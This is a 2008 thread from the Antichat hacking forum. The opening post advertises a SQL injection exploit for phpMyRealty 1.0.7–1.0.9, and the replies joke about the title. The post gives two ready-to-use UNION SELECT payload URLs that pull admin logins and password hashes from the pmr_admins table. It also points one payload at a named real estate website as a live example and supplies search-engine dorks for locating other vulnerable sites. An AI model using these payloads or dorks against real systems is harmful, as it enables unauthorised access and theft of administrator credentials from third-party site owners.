Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   phpMyRealty <= 1.0.9 (pages.php id) Remote SQL Injection Vulnerability (https://forum.antichat.xyz/showthread.php?t=82748)

~!DoK_tOR!~ 28.08.2008 16:44

phpMyRealty <= 1.0.9 (pages.php id) Remote SQL Injection Vulnerability
 
Author: ~!Dok_tOR!~
Date found: 27.08.08
Product: phpMyRealty
Version: 1.0.7, 1.0.9
Vulnerability Class: SQL Injection

Exploit 1:

Код:

http://localhost/[installdir]/pages.php?id=-999999+union+select+concat_ws(0x3a,login,password),2,3+from+pmr_admins/*
Exploit 2:

Код:

http://localhost/[installdir]/search.php?price_min=50000&price_max=-999999+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,login,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+from+pmr_admins/*
Example:

Код:

http://www.rightchoicehomes.co.uk/pages.php?id=-999999+union+select+concat_ws(0x3a,login,password),2,3+from+pmr_admins/*
Admin panel:

http://localhost/[installdir]/admin/

Dork:

Powered by phpMyRealty 1.0.7
Powered by phpMyRealty.com

http://milw0rm.com/exploits/6320
(c) ~!Dok_tOR!~

guest3297 28.08.2008 17:35

Цитата:

Remote SQL Injection Vulnerability
А бывает еще Local SQL Injection Vulnerability ?

.Slip 28.08.2008 22:03

Цитата:

Сообщение от [ cash ]
А бывает еще Local SQL Injection Vulnerability ?

Ага, из под админа:d А вообще такие названия - это мода с милворма

~!DoK_tOR!~ 28.08.2008 23:07

что вы прикопались к названию ? можно было просто назвать без Remote )


Время: 01:04